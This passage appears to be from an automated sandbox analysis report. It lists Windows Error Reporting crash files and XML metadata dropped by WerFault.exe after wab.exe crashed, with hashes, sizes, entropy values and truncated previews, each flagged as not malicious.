                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.8.5.8.3.8.7.7.9.3.8.2.0.9.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.8.5.8.3.8.8.2.5.9.4.4.6.3.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.c.b.f.a.5.f.4.-.5.5.b.f.-.4.7.c.7.-.8.a.7.f.-.d.4.e.5.7.6.3.c.5.b.6.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.b.3.9.1.3.4.0.-.b.b.6.d.-.4.b.4.c.-.8.b.9.c.-.c.f.7.b.d.8.d.a.0.6.b.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.b.a.d._.m.o.d.u.l.e._.i.n.f.o.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.1.6.0.-.0.0.0.1.-.0.0.1.5.-.0.b.c.1.-.3.a.d.3.9.c.9.7.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.6.7.7.a.3.5.6.6.7.8.9.d.4.d.a.5.4.5.9.a.1.e.c.d.0.1.a.2.9.7.c.2.6.1.a.1.3.3.a.2.!.w.a.b...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.1.9.

                                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_bad_module_info_dcd3242e9fa4189184df4216daa4e4c7cdf1959_85207d7d_562e0f79-c5ac-4f14-9bff-4ce0aa29541b\Report.wer

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):0.5802071676463086
                                                      Encrypted:false
                                                      SSDEEP:96:8ZFmCmQgAK9asQhMov7JYqQXIDcQ4c6fcE+cw3tZAX/d5FMT2SlPkpXmTAMf/VXm:A4TAKIk0WbkQzuiF6Z24IO8b
                                                      MD5:94DCA5EE1A269FD19D677220D6B8139B
                                                      SHA1:8DAF2703C667A2C2FC706F7BED80B0CD5E1ED53A
                                                      SHA-256:2774639B93C8754C9E9B8F321975C2815A03C0FB8D1E4EC893C413D112C30726
                                                      SHA-512:FC3F5AF79903C4955E8AAB312ACC5113D738374243AF5FA874CB9A916C8B03A66B1A46341DD8AA9C3DF67073E1ABE24CD57608B4DAB4902E087990622D005F6A
                                                      Malicious:false
                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.8.5.8.3.8.7.2.4.5.7.0.5.1.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.8.5.8.3.8.7.6.8.4.7.6.6.3.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.6.2.e.0.f.7.9.-.c.5.a.c.-.4.f.1.4.-.9.b.f.f.-.4.c.e.0.a.a.2.9.5.4.1.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.4.b.6.6.d.e.d.-.f.0.a.8.-.4.e.4.9.-.b.b.7.2.-.4.d.c.a.0.2.e.e.8.3.c.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.b.a.d._.m.o.d.u.l.e._.i.n.f.o.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.8.4.4.-.0.0.0.1.-.0.0.1.5.-.7.7.a.d.-.f.9.c.f.9.c.9.7.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.6.7.7.a.3.5.6.6.7.8.9.d.4.d.a.5.4.5.9.a.1.e.c.d.0.1.a.2.9.7.c.2.6.1.a.1.3.3.a.2.!.w.a.b...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.1.9.

                                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_bad_module_info_dcd3242e9fa4189184df4216daa4e4c7cdf1959_85207d7d_6c17f07a-b256-447d-a73e-2cf2d7528794\Report.wer

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):0.5802867360135184
                                                      Encrypted:false
                                                      SSDEEP:96:aWF5AKUsQhMov7JYqQXIDcQ4c6fcE+cw3tZAX/d5FMT2SlPkpXmTAMf/VXT5NHBg:lzAKUk0WbkQzuiF6Z24IO8b
                                                      MD5:73F10D631DDCD570F4642973B7E8D593
                                                      SHA1:0F9CDCE06ED8E9E7103A1D7EE90E92FF05DD5B0D
                                                      SHA-256:D848BFCD097E1F486AE7802A275B3973F865AF931A0B477C5612B2D3EA09E81B
                                                      SHA-512:62D5DB105F334BA736D60C7FDA51E47BA98B8F32063C046D7333AE1DAFC4788E62310B86D592EE7B8741D5B0379F4E863238D16AEBD01CC999D9DA1BD0DB4CC2
                                                      Malicious:false
                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.8.5.8.3.8.6.7.2.5.5.9.3.4.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.8.5.8.3.8.7.1.8.6.5.3.2.6.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.c.1.7.f.0.7.a.-.b.2.5.6.-.4.4.7.d.-.a.7.3.e.-.2.c.f.2.d.7.5.2.8.7.9.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.b.4.8.8.2.c.7.-.e.c.9.4.-.4.1.3.c.-.9.a.0.0.-.f.c.2.6.6.f.8.d.7.7.a.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.b.a.d._.m.o.d.u.l.e._.i.n.f.o.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.d.1.8.-.0.0.0.1.-.0.0.1.5.-.0.e.9.8.-.c.f.c.c.9.c.9.7.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.6.7.7.a.3.5.6.6.7.8.9.d.4.d.a.5.4.5.9.a.1.e.c.d.0.1.a.2.9.7.c.2.6.1.a.1.3.3.a.2.!.w.a.b...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.1.9.

                                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_bad_module_info_dcd3242e9fa4189184df4216daa4e4c7cdf1959_85207d7d_8044eedc-669d-4f88-8efd-c5d9d6b6de9d\Report.wer

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):0.5803074487673112
                                                      Encrypted:false
                                                      SSDEEP:96:L7faFroDAKwsQhMov7JYqQXIDcQ4c6fcE+cw3tZAX/d5FMT2SlPkpXmTAMf/VXTy:LOBGAKwk0WbkQzuiF6Z24IO8b
                                                      MD5:C411F7717879A86E3A01B635F8586AD3
                                                      SHA1:B78F524713174F8AD875C648179AA3EF0A4B76FF
                                                      SHA-256:C0A98F11CAE07D56D3A53310F7A38FC4041C6806F18F0E94A7F7D7C4B72A3395
                                                      SHA-512:54652130DACA076D52B152EFE5A6BEA31357ACA9ACB4A19D6E107C0278D613445E41A9D7A8B8135A2F14536B1B2B8BEEF506906F71511DCB453A08CC8CD42E49
                                                      Malicious:false
                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.8.5.8.3.8.7.7.7.3.7.8.0.8.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.8.5.8.3.8.8.2.7.2.2.1.6.9.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.0.4.4.e.e.d.c.-.6.6.9.d.-.4.f.8.8.-.8.e.f.d.-.c.5.d.9.d.6.b.6.d.e.9.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.3.0.a.f.e.2.2.-.7.c.0.2.-.4.d.9.d.-.8.f.2.e.-.1.3.0.a.7.6.4.e.4.b.d.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.b.a.d._.m.o.d.u.l.e._.i.n.f.o.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.1.4.-.0.0.0.1.-.0.0.1.5.-.7.5.c.a.-.2.a.d.3.9.c.9.7.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.6.7.7.a.3.5.6.6.7.8.9.d.4.d.a.5.4.5.9.a.1.e.c.d.0.1.a.2.9.7.c.2.6.1.a.1.3.3.a.2.!.w.a.b...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.1.9.

                                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_bad_module_info_dcd3242e9fa4189184df4216daa4e4c7cdf1959_85207d7d_9d8433ef-6188-4b00-b549-f230d2ca4528\Report.wer

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):0.580501044130667
                                                      Encrypted:false
                                                      SSDEEP:96:5cFGAK8sQhMov7JYqQXIDcQ4c6fcE+cw3tZAX/d5FMT2SlPkpXmTAMf/VXT5NHBg:+8AK8k0WbkQzuiF6Z24IO8b
                                                      MD5:5C7EACDBE6E70C7F6ED823276C3162E7
                                                      SHA1:2EB5C0D155D419EB1FD94162657D8C996AAF9CD1
                                                      SHA-256:0507F59711498D62CF6EAF37768D6239A2844EE7D714801B00EC722140130148
                                                      SHA-512:B06E115EB386F455407930CA7B0036C251CA475AE49EC74CA94CD38833E894642CEC9114B808A25D8BF3BBBF6F7BD39D7EFD128998BFE49B9271B5FE945EDB2B
                                                      Malicious:false
                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.8.5.8.3.8.6.7.2.1.1.1.7.8.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.8.5.8.3.8.7.1.9.1.4.2.9.7.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.d.8.4.3.3.e.f.-.6.1.8.8.-.4.b.0.0.-.b.5.4.9.-.f.2.3.0.d.2.c.a.4.5.2.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.c.3.0.c.4.1.5.-.f.3.4.9.-.4.8.d.b.-.8.5.0.e.-.6.6.4.b.0.0.9.4.d.c.9.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.b.a.d._.m.o.d.u.l.e._.i.n.f.o.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.7.6.c.-.0.0.0.1.-.0.0.1.5.-.3.c.6.0.-.c.c.c.c.9.c.9.7.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.6.7.7.a.3.5.6.6.7.8.9.d.4.d.a.5.4.5.9.a.1.e.c.d.0.1.a.2.9.7.c.2.6.1.a.1.3.3.a.2.!.w.a.b...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.1.9.

                                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_bad_module_info_dcd3242e9fa4189184df4216daa4e4c7cdf1959_85207d7d_cc31fde0-7bd0-477c-9450-f47db8308721\Report.wer

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):0.5806825811562569
                                                      Encrypted:false
                                                      SSDEEP:96:LhqFBAAK3sQhMov7JYqQXIDcQ4c6fcE+cw3tZAX/d5FMT2SlPkpXmTAMf/VXT5Nm:LojAAK3k0WbkQzuiF6Z24IO8b
                                                      MD5:C1E89622183B8C7590A2AABDA888C231
                                                      SHA1:A14F8735FB13C1697AD715A529BDEA4C2B2882F3
                                                      SHA-256:5E96789A87C65B01AFD9931AE1170BF54A65F78F8C4722C15884DDB20C9FB4B3
                                                      SHA-512:E7021AAF5627A44FB88CEB96D2D3E1EA72784FA4A8836CE77CA1BC33294133E6B039BAE77D2164660875875B5D0DA8F2219044F9C8CC48CAEE7AF1FCB04823DE
                                                      Malicious:false
                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.8.5.8.3.8.7.7.8.4.9.8.3.0.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.8.5.8.3.8.8.2.7.2.4.8.1.7.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.c.3.1.f.d.e.0.-.7.b.d.0.-.4.7.7.c.-.9.4.5.0.-.f.4.7.d.b.8.3.0.8.7.2.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.d.9.7.0.4.5.0.-.f.a.5.6.-.4.9.5.0.-.b.8.a.2.-.2.d.3.f.f.c.0.2.8.8.6.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.b.a.d._.m.o.d.u.l.e._.i.n.f.o.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.1.1.4.-.0.0.0.1.-.0.0.1.5.-.2.1.0.d.-.3.1.d.3.9.c.9.7.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.6.7.7.a.3.5.6.6.7.8.9.d.4.d.a.5.4.5.9.a.1.e.c.d.0.1.a.2.9.7.c.2.6.1.a.1.3.3.a.2.!.w.a.b...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.1.9.

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER194A.tmp.WERInternalMetadata.xml

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):8254
                                                      Entropy (8bit):3.679181890075627
                                                      Encrypted:false
                                                      SSDEEP:192:R6l7wVeJjk6g86YBF6sJAgmfUBpxt89b2Gsftym:R6lXJg6g86Yz6sOgmfUE2lfp
                                                      MD5:AF3A93CBB7CBC59F5BC9FEF294FCB831
                                                      SHA1:676F2A0658B6F160DBEC4C66B86645A9F47A28B8
                                                      SHA-256:1F96BCB1EA3E416973E7157861FECBEB54242FBEEF433B4D78DB0AE447B37B35
                                                      SHA-512:189B89DC6959CDEC0140D6369E520DB9B1EBF717A1CF67014E56881BDAB2A14049EFD59B7DD3178CC606ABC202055F76A391D61E089D6E9753B8FB4076C7E021
                                                      Malicious:false
                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.9.3.2.<./.P.i.

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER19D8.tmp.xml

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):4564
                                                      Entropy (8bit):4.430204088944599
                                                      Encrypted:false
                                                      SSDEEP:48:cvIwWl8zsMJg77aI9L4WpW8VY6PYm8M4JTHFO+q876K27I3dBid:uIjfKI7Jx7VDSJoTk3dBid
                                                      MD5:514C106E266FF244AC8B7D2837C7C2CB
                                                      SHA1:B93A2836AD82016F53568715661DA9100B141562
                                                      SHA-256:6B5FD7A34744A444141BDA50F47EF902D798E49CC879349559A89A39EAFE0594
                                                      SHA-512:E4BD4BB36B19592749303BD131C39A155E907BDF55B66180A532734C72793309657B000AE23AEFCC21A3E48B92FBDA95F49E5EE2C5E50D84935C9D0CFE5FFD82
                                                      Malicious:false
                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="296447" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER1A15.tmp.WERInternalMetadata.xml

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):8250
                                                      Entropy (8bit):3.6803364399963074
                                                      Encrypted:false
                                                      SSDEEP:192:R6l7wVeJRZ6Ha56YBg6sJAgmfUBpx089bN5sfiPm:R6lXJP6HU6YW6sOgmfUfNSfz
                                                      MD5:78DDB095C3EDEE0A745BD77221FAC14F
                                                      SHA1:A2D97BC56E47F45740CF55DCC2E233F97500EDF2
                                                      SHA-256:CCE2A3BECC529382B49A000F6DE7BBAFD028310707A7B83DA51D3FD51DBC4D36
                                                      SHA-512:52CD44EF4308568669401F2648BD992E73ECD2ABBE8D7198E1E3EB02410C8A1A9588CC7289EDB671F410841599879E79E06E19AD56171CF90101CE2B4D34819E
                                                      Malicious:false
                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.5.2.<./.P.i.d.

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER1A25.tmp.WERInternalMetadata.xml

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):8254
                                                      Entropy (8bit):3.679908531407476
                                                      Encrypted:false
                                                      SSDEEP:192:R6l7wVeJ/vq6YT6YBK6sJAgmfUBpxB89bNJsfCPm:R6lXJHq6YT6Y86sOgmfUwNifT
                                                      MD5:0D770D16D0F35D22A9053C42C96AE214
                                                      SHA1:0FE2B1629AAB6DAF02E107414FD186D1833D3124
                                                      SHA-256:95744C39E224D969EE04FDD07212E291BFC2784C946F4E254F8469D64A1686AD
                                                      SHA-512:4A1282083FFBBE86A12EF606F13B8198C7CA1C255B934C5B2E8CB8DFD7C17A4BBA9BE46A211FAEBEEDBC74F3F6E83F3947D2898AA709C25100CB4494D5D695BE
                                                      Malicious:false
                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.3.7.2.<./.P.i.

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER1A74.tmp.xml

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):4564
                                                      Entropy (8bit):4.430873193422089
                                                      Encrypted:false
                                                      SSDEEP:48:cvIwWl8zsMJg77aI9L4WpW8VY1K5Ym8M4JTHFo+q87xUK27I3dB3d:uIjfKI7Jx7VnoJuIsk3dB3d
                                                      MD5:8158D1792C61C51EBCAE9003E223ACE8
                                                      SHA1:082B656C3125082689B4459E7EBA924E11119F26
                                                      SHA-256:B9581337BCE521A51A01BEB51E5210B0EFE20FE2EB80AECA7B16CDBBEA9E2D47
                                                      SHA-512:5BB25843BB0EB8289DC2A88A90C8494887075D832D1560F8D14B5D7EABEF58C1EB8397463B599522D9BFB7BB4080453C6BEBB10C6880328A7E4C1034721B8BA4
                                                      Malicious:false
                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="296447" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER1A75.tmp.xml

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):4564
                                                      Entropy (8bit):4.43070793309753
                                                      Encrypted:false
                                                      SSDEEP:48:cvIwWl8zsMJg77aI9L4WpW8VYoYm8M4JTHFY+q87I27I3dBdd:uIjfKI7Jx7VIJ68k3dBdd
                                                      MD5:C01C2818407CCBE0722208FBCA9929E3
